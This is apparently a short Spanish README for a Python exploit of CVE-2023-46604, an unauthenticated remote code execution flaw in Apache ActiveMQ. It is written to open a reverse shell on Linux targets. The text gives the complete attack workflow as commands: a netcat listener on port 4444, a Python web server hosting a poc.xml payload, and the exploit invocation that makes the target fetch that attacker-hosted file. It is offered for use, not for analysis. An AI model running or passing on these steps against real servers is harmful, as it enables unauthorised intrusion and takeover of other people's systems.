
Exploit de CVE-2023-46604-RCE con payload de shell inversa para Linux
Implementación en Python de la ejecución remota de código no autenticada en Apache ActiveMQ
nc -lvnp 4444 -> Iniciar listener
python3 -m http.server 8080 -> Servir poc.xml que contiene tu payload
python3 CVE-2023-46604-RCE.py -i <Target-IP> -p <Target-Port> -u http://<Your-IP>:8080/poc.xml -> Iniciar exploit